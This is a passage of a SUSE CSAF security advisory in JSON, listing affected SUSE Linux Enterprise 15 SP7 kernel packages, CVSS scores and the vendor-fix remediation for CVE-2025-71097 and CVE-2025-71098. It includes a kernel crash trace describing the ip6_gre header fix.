"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
